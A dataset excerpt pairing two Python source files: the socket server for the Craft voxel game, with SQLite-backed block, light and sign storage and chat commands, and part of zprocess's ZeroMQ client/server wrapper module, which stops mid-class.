source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
server.py | # Copyright (C) 2013 Michael Fogleman
# 2020 William Emerison Six
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from math import floor
from world import World
import Queue
import SocketServer
import datetime
import random
import re
import requests
import sqlite3
import sys
import threading
import time
import traceback
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 4080
DB_PATH = 'craft.db'
LOG_PATH = 'log.txt'
CHUNK_SIZE = 32
BUFFER_SIZE = 4096
COMMIT_INTERVAL = 5
AUTH_REQUIRED = True
AUTH_URL = 'https://craft.michaelfogleman.com/api/1/access'
DAY_LENGTH = 600
SPAWN_POINT = (0, 0, 0, 0, 0)
RATE_LIMIT = False
RECORD_HISTORY = False
INDESTRUCTIBLE_ITEMS = set([16])
ALLOWED_ITEMS = set([
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
17, 18, 19, 20, 21, 22, 23,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63])
AUTHENTICATE = 'A'
BLOCK = 'B'
CHUNK = 'C'
DISCONNECT = 'D'
KEY = 'K'
LIGHT = 'L'
NICK = 'N'
POSITION = 'P'
REDRAW = 'R'
SIGN = 'S'
TALK = 'T'
TIME = 'E'
VERSION = 'V'
YOU = 'U'
try:
from config import *
except ImportError:
pass
def log(*args):
now = datetime.datetime.utcnow()
line = ' '.join(map(str, (now,) + args))
print line
with open(LOG_PATH, 'a') as fp:
fp.write('%s\n' % line)
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
def packet(*args):
return '%s\n' % ','.join(map(str, args))
class RateLimiter(object):
def __init__(self, rate, per):
self.rate = float(rate)
self.per = float(per)
self.allowance = self.rate
self.last_check = time.time()
def tick(self):
if not RATE_LIMIT:
return False
now = time.time()
elapsed = now - self.last_check
self.last_check = now
self.allowance += elapsed * (self.rate / self.per)
if self.allowance > self.rate:
self.allowance = self.rate
if self.allowance < 1:
return True # too fast
else:
self.allowance -= 1
return False # okay
class Server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Handler(SocketServer.BaseRequestHandler):
def setup(self):
self.position_limiter = RateLimiter(100, 5)
self.limiter = RateLimiter(1000, 10)
self.version = None
self.client_id = None
self.user_id = None
self.nick = None
self.queue = Queue.Queue()
self.running = True
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
data = self.request.recv(BUFFER_SIZE)
if not data:
break
buf.extend(data.replace('\r\n', '\n'))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
if not line:
continue
if line[0] == POSITION:
if self.position_limiter.tick():
log('RATE', self.client_id)
self.stop()
return
else:
if self.limiter.tick():
log('RATE', self.client_id)
self.stop()
return
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def stop(self):
self.request.close()
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except Queue.Empty:
pass
except Queue.Empty:
continue
data = ''.join(buf)
self.request.sendall(data)
except Exception:
self.request.close()
raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
self.send_raw(packet(*args))
class Model(object):
def __init__(self, seed):
self.world = World(seed)
self.clients = []
self.queue = Queue.Queue()
self.commands = {
AUTHENTICATE: self.on_authenticate,
CHUNK: self.on_chunk,
BLOCK: self.on_block,
LIGHT: self.on_light,
POSITION: self.on_position,
TALK: self.on_talk,
SIGN: self.on_sign,
VERSION: self.on_version,
}
self.patterns = [
(re.compile(r'^/nick(?:\s+([^,\s]+))?$'), self.on_nick),
(re.compile(r'^/spawn$'), self.on_spawn),
(re.compile(r'^/goto(?:\s+(\S+))?$'), self.on_goto),
(re.compile(r'^/pq\s+(-?[0-9]+)\s*,?\s*(-?[0-9]+)$'), self.on_pq),
(re.compile(r'^/help(?:\s+(\S+))?$'), self.on_help),
(re.compile(r'^/list$'), self.on_list),
]
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
while True:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except Queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
'create table if not exists light ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists light_pqxyz_idx on '
' light (p, q, x, y, z);',
'create table if not exists sign ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' face int not null,'
' text text not null'
');',
'create index if not exists sign_pq_idx on sign (p, q);',
'create unique index if not exists sign_xyzface_idx on '
' sign (x, y, z, face);',
'create table if not exists block_history ('
' timestamp real not null,'
' user_id int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
]
for query in queries:
self.execute(query)
def get_default_block(self, x, y, z):
p, q = chunked(x), chunked(z)
chunk = self.world.get_chunk(p, q)
return chunk.get((x, y, z), 0)
def get_block(self, x, y, z):
query = (
'select w from block where '
'p = :p and q = :q and x = :x and y = :y and z = :z;'
)
p, q = chunked(x), chunked(z)
rows = list(self.execute(query, dict(p=p, q=q, x=x, y=y, z=z)))
if rows:
return rows[0][0]
return self.get_default_block(x, y, z)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
client.nick = 'guest%d' % client.client_id
log('CONN', client.client_id, *client.client_address)
client.position = SPAWN_POINT
self.clients.append(client)
client.send(YOU, client.client_id, *client.position)
client.send(TIME, time.time(), DAY_LENGTH)
client.send(TALK, 'Welcome to Craft!')
client.send(TALK, 'Type "/help" for a list of commands.')
self.send_position(client)
self.send_positions(client)
self.send_nick(client)
self.send_nicks(client)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
self.send_talk('%s has disconnected from the server.' % client.nick)
def on_version(self, client, version):
if client.version is not None:
return
version = int(version)
if version != 1:
client.stop()
return
client.version = version
# TODO: client.start() here
def on_authenticate(self, client, username, access_token):
user_id = None
if username and access_token:
payload = {
'username': username,
'access_token': access_token,
}
response = requests.post(AUTH_URL, data=payload)
if response.status_code == 200 and response.text.isdigit():
user_id = int(response.text)
client.user_id = user_id
if user_id is None:
client.nick = 'guest%d' % client.client_id
client.send(TALK, 'Visit craft.michaelfogleman.com to register!')
else:
client.nick = username
self.send_nick(client)
# TODO: has left message if was already authenticated
self.send_talk('%s has joined the game.' % client.nick)
def on_chunk(self, client, p, q, key=0):
packets = []
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
blocks = 0
for rowid, x, y, z, w in rows:
blocks += 1
packets.append(packet(BLOCK, p, q, x, y, z, w))
max_rowid = max(max_rowid, rowid)
query = (
'select x, y, z, w from light where '
'p = :p and q = :q;'
)
rows = self.execute(query, dict(p=p, q=q))
lights = 0
for x, y, z, w in rows:
lights += 1
packets.append(packet(LIGHT, p, q, x, y, z, w))
query = (
'select x, y, z, face, text from sign where '
'p = :p and q = :q;'
)
rows = self.execute(query, dict(p=p, q=q))
signs = 0
for x, y, z, face, text in rows:
signs += 1
packets.append(packet(SIGN, p, q, x, y, z, face, text))
if blocks:
packets.append(packet(KEY, p, q, max_rowid))
if blocks or lights or signs:
packets.append(packet(REDRAW, p, q))
packets.append(packet(CHUNK, p, q))
client.send_raw(''.join(packets))
def on_block(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
previous = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif w not in ALLOWED_ITEMS:
message = 'That item is not allowed.'
elif w and previous:
message = 'Cannot create blocks in a non-empty space.'
elif not w and not previous:
message = 'That space is already empty.'
elif previous in INDESTRUCTIBLE_ITEMS:
message = 'Cannot destroy that type of block.'
if message is not None:
client.send(BLOCK, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert into block_history (timestamp, user_id, x, y, z, w) '
'values (:timestamp, :user_id, :x, :y, :z, :w);'
)
if RECORD_HISTORY:
self.execute(query, dict(timestamp=time.time(),
user_id=client.user_id, x=x, y=y, z=z, w=w))
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
for dx in range(-1, 2):
for dz in range(-1, 2):
if dx == 0 and dz == 0:
continue
if dx and chunked(x + dx) == p:
continue
if dz and chunked(z + dz) == q:
continue
np, nq = p + dx, q + dz
self.execute(query, dict(p=np, q=nq, x=x, y=y, z=z, w=-w))
self.send_block(client, np, nq, x, y, z, -w)
if w == 0:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update light set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
def on_light(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif block == 0:
message = 'Lights must be placed on a block.'
elif w < 0 or w > 15:
message = 'Invalid light value.'
if message is not None:
# TODO: client.send(LIGHT, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into light (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_light(client, p, q, x, y, z, w)
def on_sign(self, client, x, y, z, face, *args):
if AUTH_REQUIRED and client.user_id is None:
client.send(TALK, 'Only logged in users are allowed to build.')
return
text = ','.join(args)
x, y, z, face = map(int, (x, y, z, face))
if y <= 0 or y > 255:
return
if face < 0 or face > 7:
return
if len(text) > 48:
return
p, q = chunked(x), chunked(z)
if text:
query = (
'insert or replace into sign (p, q, x, y, z, face, text) '
'values (:p, :q, :x, :y, :z, :face, :text);'
)
self.execute(query,
dict(p=p, q=q, x=x, y=y, z=z, face=face, text=text))
else:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z and face = :face;'
)
self.execute(query, dict(x=x, y=y, z=z, face=face))
self.send_sign(client, p, q, x, y, z, face, text)
def on_position(self, client, x, y, z, rx, ry):
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.position = (x, y, z, rx, ry)
self.send_position(client)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
elif text.startswith('@'):
nick = text[1:].split(' ', 1)[0]
for other in self.clients:
if other.nick == nick:
client.send(TALK, '%s> %s' % (client.nick, text))
other.send(TALK, '%s> %s' % (client.nick, text))
break
else:
client.send(TALK, 'Unrecognized nick: "%s"' % nick)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, nick=None):
if AUTH_REQUIRED:
client.send(TALK, 'You cannot change your nick on this server.')
return
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.nick)
else:
self.send_talk('%s is now known as %s' % (client.nick, nick))
client.nick = nick
self.send_nick(client)
def on_spawn(self, client):
client.position = SPAWN_POINT
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_goto(self, client, nick=None):
if nick is None:
clients = [x for x in self.clients if x != client]
other = random.choice(clients) if clients else None
else:
nicks = dict((client.nick, client) for client in self.clients)
other = nicks.get(nick)
if other:
client.position = other.position
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_pq(self, client, p, q):
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_help(self, client, topic=None):
if topic is None:
client.send(TALK, 'Type "t" to chat. Type "/" to type commands:')
client.send(TALK, '/goto [NAME], /help [TOPIC], /list, /login NAME, /logout, /nick')
client.send(TALK, '/offline [FILE], /online HOST [PORT], /pq P Q, /spawn, /view N')
return
topic = topic.lower().strip()
if topic == 'goto':
client.send(TALK, 'Help: /goto [NAME]')
client.send(TALK, 'Teleport to another user.')
client.send(TALK, 'If NAME is unspecified, a random user is chosen.')
elif topic == 'list':
client.send(TALK, 'Help: /list')
client.send(TALK, 'Display a list of connected users.')
elif topic == 'login':
client.send(TALK, 'Help: /login NAME')
client.send(TALK, 'Switch to another registered username.')
client.send(TALK, 'The login server will be re-contacted. The username is case-sensitive.')
elif topic == 'logout':
client.send(TALK, 'Help: /logout')
client.send(TALK, 'Unauthenticate and become a guest user.')
client.send(TALK, 'Automatic logins will not occur again until the /login command is re-issued.')
elif topic == 'offline':
client.send(TALK, 'Help: /offline [FILE]')
client.send(TALK, 'Switch to offline mode.')
client.send(TALK, 'FILE specifies the save file to use and defaults to "craft".')
elif topic == 'online':
client.send(TALK, 'Help: /online HOST [PORT]')
client.send(TALK, 'Connect to the specified server.')
elif topic == 'nick':
client.send(TALK, 'Help: /nick [NICK]')
client.send(TALK, 'Get or set your nickname.')
elif topic == 'pq':
client.send(TALK, 'Help: /pq P Q')
client.send(TALK, 'Teleport to the specified chunk.')
elif topic == 'spawn':
client.send(TALK, 'Help: /spawn')
client.send(TALK, 'Teleport back to the spawn point.')
elif topic == 'view':
client.send(TALK, 'Help: /view N')
client.send(TALK, 'Set viewing distance, 1 - 24.')
def on_list(self, client):
client.send(TALK,
'Players: %s' % ', '.join(x.nick for x in self.clients))
def send_positions(self, client):
for other in self.clients:
if other == client:
continue
client.send(POSITION, other.client_id, *other.position)
def send_position(self, client):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, *client.position)
def send_nicks(self, client):
for other in self.clients:
if other == client:
continue
client.send(NICK, other.client_id, other.nick)
def send_nick(self, client):
for other in self.clients:
other.send(NICK, client.client_id, client.nick)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_light(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(LIGHT, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_sign(self, client, p, q, x, y, z, face, text):
for other in self.clients:
if other == client:
continue
other.send(SIGN, p, q, x, y, z, face, text)
def send_talk(self, text):
log(text)
for client in self.clients:
client.send(TALK, text)
def cleanup():
world = World(None)
conn = sqlite3.connect(DB_PATH)
query = 'select x, y, z from block order by rowid desc limit 1;'
last = list(conn.execute(query))[0]
query = 'select distinct p, q from block;'
chunks = list(conn.execute(query))
count = 0
total = 0
delete_query = 'delete from block where x = %d and y = %d and z = %d;'
print 'begin;'
for p, q in chunks:
chunk = world.create_chunk(p, q)
query = 'select x, y, z, w from block where p = :p and q = :q;'
rows = conn.execute(query, {'p': p, 'q': q})
for x, y, z, w in rows:
if chunked(x) != p or chunked(z) != q:
continue
total += 1
if (x, y, z) == last:
continue
original = chunk.get((x, y, z), 0)
if w == original or original in INDESTRUCTIBLE_ITEMS:
count += 1
print delete_query % (x, y, z)
conn.close()
print 'commit;'
print >> sys.stderr, '%d of %d blocks will be cleaned up' % (count, total)
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'cleanup':
cleanup()
return
host, port = DEFAULT_HOST, DEFAULT_PORT
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model(None)
model.start()
server = Server((host, port), Handler)
server.model = model
server.serve_forever()
if __name__ == '__main__':
main()
|
clientserver.py | #####################################################################
# #
# clientserver.py #
# #
# Copyright 2013 - 2018, Chris Billington #
# #
# This file is part of the zprocess project (see #
# https://bitbucket.org/cbillington/zprocess) and is licensed under #
# the Simplified BSD License. See the license.txt file in the root #
# of the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
import sys
import os
import threading
import time
import traceback
from functools import partial
from socket import gethostbyname
from binascii import hexlify
import zmq
_path, _cwd = os.path.split(os.getcwd())
if _cwd == 'zprocess' and _path not in sys.path:
# Running from within zprocess dir? Add to sys.path for testing during
# development:
sys.path.insert(0, _path)
import zprocess
from zprocess.security import SecureContext
from zprocess.utils import (
raise_exception_in_thread,
Interruptor,
Interrupted,
TimeoutError,
)
PY2 = sys.version_info[0] == 2
if PY2:
from time import time as monotonic
str = unicode
else:
from time import monotonic
def _typecheck_or_convert_data(data, dtype):
"""Utility function to check that messages are the valid type to be sent, for
the dtype (one of 'pyobj', 'multipart', 'string', or 'raw'). Returns converted
data or raises TypeError. Only conversion done is to wrap single bytes objects
into a single-element list for multipart messages. We *do not* do auto encoding
of strings here. Strings can't be sent by raw and multipart sends, so yes, they
need to be encoded, but we can't to auto *decoding* on the other end, because
the data may not represent text - it might just be bytes. So we prefer symmetry
and so don't encode here."""
# when not using python objects, a null message should be an empty string:
if data is None and dtype in ['raw', 'multipart']:
data = b''
elif data is None and dtype == 'string':
data = ''
if dtype == 'multipart' and isinstance(data, bytes):
# Wrap up a single string into a list so it doesn't get sent
# as one character per message!
data = [data]
# Type error checking:
if dtype == 'raw':
if not isinstance(data, bytes):
msg = 'raw sockets can only send bytes, not {}.'.format(type(data))
raise TypeError(msg)
elif dtype == 'string':
if PY2 and isinstance(data, bytes):
# Auto convert assuming UTF8:
data = data.decode('utf8')
if not isinstance(data, str):
msg = ('string sockets can only send strings, ' +
'not {}.'.format(type(data)))
raise TypeError(msg)
elif dtype == 'multipart':
if not all(isinstance(part, bytes) for part in data):
msg = ('multipart sockets can only send an iterable of '
'bytes objects, not {}.'.format(type(data)))
raise TypeError(msg)
elif dtype != 'pyobj':
msg = ("invalid dtype %s, " % str(dtype) +
"must be 'raw', 'string', 'multipart' or 'pyobj'")
raise ValueError(msg)
return data
class _NO_RESPONSE(object):
"""Sentinel for use as a return value from ZMQServer.handler to indicate that a
response has already been sent to the client manually via ZMQServer.send(), and that
the server mainloop should not send a response"""
pass
class ZMQServer(object):
NO_RESPONSE = _NO_RESPONSE
"""Wrapper around a zmq.REP or zmq.PULL socket"""
def __init__(self, port=None, dtype='pyobj', pull_only=False,
bind_address='tcp://*', shared_secret=None,
allow_insecure=False, timeout_interval=None):
self.port = port
self.dtype = dtype
self.pull_only = pull_only
self.bind_address = bind_address
self.shared_secret = shared_secret
self.allow_insecure = allow_insecure
self.timeout_interval = timeout_interval
self._crashed = threading.Event()
self.stopping = False
if 'setup_auth' in self.__class__.__dict__:
# Backward compatibility for subclasses implementing their own
# authentication:
self.context = zmq.Context()
self.auth = self.setup_auth(self.context)
if self.pull_only:
self.sock = self.context.socket(zmq.PULL)
else:
self.sock = self.context.socket(zmq.REP)
else:
# Our shared secret authentication:
self.context = SecureContext.instance(shared_secret=shared_secret)
if self.pull_only:
self.sock = self.context.socket(zmq.PULL,
allow_insecure=allow_insecure)
else:
self.sock = self.context.socket(zmq.REP,
allow_insecure=allow_insecure)
self.poller = zmq.Poller()
self.sock.setsockopt(zmq.LINGER, 0)
if self.port is not None:
self.sock.bind('%s:%d' % (self.bind_address, self.port))
else:
self.port = self.sock.bind_to_random_port(self.bind_address)
self.poller.register(self.sock, zmq.POLLIN)
self._shutdown_sock = self.context.socket(zmq.PULL)
self._shutdown_endpoint = 'inproc://zpself' + hexlify(os.urandom(8)).decode()
self._shutdown_sock.bind(self._shutdown_endpoint)
self.poller.register(self._shutdown_sock, zmq.POLLIN)
if self.dtype == 'raw':
self.send = self.sock.send
self.recv = self.sock.recv
elif self.dtype == 'string':
self.send = self.sock.send_string
self.recv = self.sock.recv_string
elif self.dtype == 'multipart':
self.send = self.sock.send_multipart
self.recv = self.sock.recv_multipart
elif self.dtype == 'pyobj':
self.send = partial(self.sock.send_pyobj,
protocol=zprocess.PICKLE_PROTOCOL)
self.recv = self.sock.recv_pyobj
else:
msg = ("invalid dtype %s, must be 'raw', 'string', " +
"'multipart' or 'pyobj'" % str(self.dtype))
raise ValueError(msg)
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def setup_auth(self, context):
"""Deprecated. To be overridden by subclasses setting up their
own authentication. If present in a subclass, this will be called
and no shared secret authentication will be used."""
pass
def timeout(self):
"""A function to call every self.timeout_interval seconds in the same thread as
the handler. Subclasses should implement this for cleanups and the like"""
pass
def shutdown_on_interrupt(self):
try:
# This while loop could be replaced with a simple self._crashed.wait(), but
# there is a bug such that wait() cannot be interrupted with ctrl-C on
# Windows, see https://bugs.python.org/issue35935. time.sleep() can be
# interrupted though, so we sleep and check once a second if the server
# crashed.
while True:
time.sleep(1)
# Return if mainloop crashes
if self._crashed.is_set():
msg = "Server mainloop crashed"
raise RuntimeError(msg)
except KeyboardInterrupt:
print('KeyboardInterrupt, stopping.', file=sys.stderr)
finally:
self.shutdown()
def mainloop(self):
if self.timeout_interval is not None:
next_timeout = monotonic() + self.timeout_interval
else:
next_timeout = None
try:
while True:
if next_timeout is not None:
timeout = next_timeout - monotonic()
timeout = max(0, timeout)
events = dict(self.poller.poll(int(timeout*1000)))
if not events:
# Timed out. Run our timeout method
try:
self.timeout()
except Exception:
# Raise the exception in a separate thread so that the
# server keeps running:
exc_info = sys.exc_info()
raise_exception_in_thread(exc_info)
# Compute next timeout time
next_timeout = monotonic() + self.timeout_interval
continue
else:
events = dict(self.poller.poll())
if self._shutdown_sock in events:
assert self._shutdown_sock.recv() == b'stop'
break
request_data = self.recv()
try:
response_data = self.handler(request_data)
if response_data is self.NO_RESPONSE:
continue
if self.pull_only and response_data is not None:
msg = ("Pull-only server hander() method returned " +
"non-None value %s. Ignoring." % str(response_data))
raise ValueError(msg)
response_data = _typecheck_or_convert_data(response_data,
self.dtype)
except Exception:
# Raise the exception in a separate thread so that the
# server keeps running:
exc_info = sys.exc_info()
raise_exception_in_thread(exc_info)
exception_string = traceback.format_exc()
if not self.pull_only:
# Send the error to the client:
msg = ("The server had an unhandled exception whilst " +
"processing the request:\n%s" % str(exception_string))
try:
response_data = exc_info[0](msg)
except Exception:
response_data = RuntimeError(msg)
if self.dtype == 'raw':
response_data = str(response_data).encode('utf8')
elif self.dtype == 'multipart':
response_data = [str(response_data).encode('utf8')]
elif self.dtype == 'string':
response_data = str(response_data)
response_data = _typecheck_or_convert_data(response_data,
self.dtype)
if not self.pull_only:
self.send(response_data)
except Exception:
self._crashed.set()
raise
def shutdown(self):
self.stopping = True
sock = self.context.socket(zmq.PUSH)
sock.connect(self._shutdown_endpoint)
sock.send(b'stop')
self.mainloop_thread.join()
sock.close(linger=True)
self.sock.close(linger=False)
self.stopping = False
def handler(self, request_data):
"""To be overridden by subclasses. This is an example
implementation"""
response = ('This is an example ZMQServer. ' +
'Your request was %s.' % str(request_data))
return response
class _Sender(object):
"""Wrapper around a zmq.PUSH or zmq.REQ socket, returning a callable
for sending (and optionally receiving data)"""
def __init__(
self,
dtype='pyobj',
push_only=False,
shared_secret=None,
allow_insecure=False,
interruptor=None,
):
self.local = threading.local()
self.dtype = dtype
self.push_only = push_only
self.shared_secret = shared_secret
self.allow_insecure = allow_insecure
self.interruptor = interruptor
assert self.interruptor is not None # Should be passed in by parent ZMQClient
def new_socket(self, host, port, timeout=5, interruptor=None):
# Every time the REQ/REP cadence is broken, we need to create
# and connect a new socket to get it back on track. Also, we have
# a separate socket for each thread. Also a new socket if there
# is a different host or port. We also create a poller and register
# the socket to it.
if timeout is not None:
timeout *= 1000 # convert to ms
self.local.host = gethostbyname(host)
self.local.port = int(port)
context = SecureContext.instance(shared_secret=self.shared_secret)
if self.push_only:
self.local.sock = context.socket(
zmq.PUSH, allow_insecure=self.allow_insecure
)
else:
self.local.sock = context.socket(
zmq.REQ, allow_insecure=self.allow_insecure
)
self.local.poller = zmq.Poller()
self.local.poller.register(self.local.sock)
try:
# Allow up to 1 second to send unsent messages on socket shutdown:
self.local.sock.setsockopt(zmq.LINGER, 1000)
self.local.sock.connect(
'tcp://%s:%d' % (self.local.host, self.local.port),
timeout=timeout,
interruptor=interruptor,
)
# Different send/recv methods depending on the desired protocol:
if self.dtype == 'raw':
self.local.send = self.local.sock.send
self.local.recv = self.local.sock.recv
elif self.dtype == 'string':
self.local.send = self.local.sock.send_string
self.local.recv = self.local.sock.recv_string
elif self.dtype == 'multipart':
self.local.send = self.local.sock.send_multipart
self.local.recv = self.local.sock.recv_multipart
elif self.dtype == 'pyobj':
self.local.send = partial(
self.local.sock.send_pyobj, protocol=zprocess.PICKLE_PROTOCOL
)
self.local.recv = self.local.sock.recv_pyobj
else:
msg = (
"invalid dtype %s, must be 'raw', 'string', "
+ "'multipart' or 'pyobj'" % str(self.dtype)
)
raise ValueError(msg)
except:
# Didn't work, don't keep it:
del self.local.sock
del self.local.poller
raise
def __call__(
self,
port,
host='localhost',
data=None,
timeout=5,
interruptor=None,
raise_server_exceptions=True,
):
"""If self.push_only, send data on the push socket.
Otherwise, uses reliable request-reply to send data to a zmq REP
socket, and return the reply. If raise_server_exceptions set to False, then
returns exception objects from the server instead of raising them."""
# We cache the socket so as to not exhaust ourselves of tcp
# ports. However if a different server is in use, we need a new
# socket. Also if we don't have a socket, we also need a new one:
if (
not hasattr(self.local, 'sock')
or gethostbyname(host) != self.local.host
or int(port) != self.local.port
):
self.new_socket(host, port, timeout, interruptor=interruptor)
data = _typecheck_or_convert_data(data, self.dtype)
if timeout is not None:
deadline = monotonic() + timeout
if interruptor is None:
interruptor = self.interruptor
try:
interruption_sock = interruptor.subscribe()
self.local.poller.register(interruption_sock)
# Attempt to send until interruption or timeout:
while True:
if timeout is not None:
remaining = max(0, (deadline - monotonic()) * 1000) # ms
else:
remaining = None
events = dict(self.local.poller.poll(remaining))
if not events:
raise TimeoutError('Could not send data to server: timed out')
if interruption_sock in events:
raise Interrupted(interruption_sock.recv().decode('utf8'))
assert events[self.local.sock] == zmq.POLLOUT
try:
self.local.send(data, zmq.NOBLOCK)
if self.push_only:
return
else:
break
except zmq.ZMQError:
# Queue became full or we disconnected or something, keep
# polling:
continue
# Separate timeout for send() and recv()
if timeout is not None:
remaining = max(0, timeout * 1000) # ms
# Wait for response until interrupt or timeout:
events = dict(self.local.poller.poll(remaining))
if not events:
raise TimeoutError('No response from server: timed out')
if interruption_sock in events:
raise Interrupted(interruption_sock.recv().decode('utf8'))
assert events[self.local.sock] == zmq.POLLIN
response = self.local.recv()
if isinstance(response, Exception) and raise_server_exceptions:
raise response
return response
except:
# Any exceptions, we want to stop using this socket:
self.local.sock.close(linger=0)
del self.local.sock
raise
finally:
self.local.poller.unregister(interruption_sock)
interruptor.unsubscribe()
class ZMQClient(object):
"""Wrapper around zmq REQ or PUSH socket"""
def __init__(self, shared_secret=None, allow_insecure=False):
self.shared_secret = shared_secret
self.allow_insecure = allow_insecure
self.interruptor = Interruptor()
kwargs = {'shared_secret': shared_secret,
'allow_insecure': allow_insecure,
'interruptor': self.interruptor}
self.get = _Sender('pyobj', **kwargs)
self.get_multipart = _Sender('multipart', **kwargs)
self.get_string = _Sender('string', **kwargs)
self.get_raw = _Sender('raw', **kwargs)
self.push = _Sender('pyobj', push_only=True, **kwargs)
self.push_multipart = _Sender('multipart', push_only=True, **kwargs)
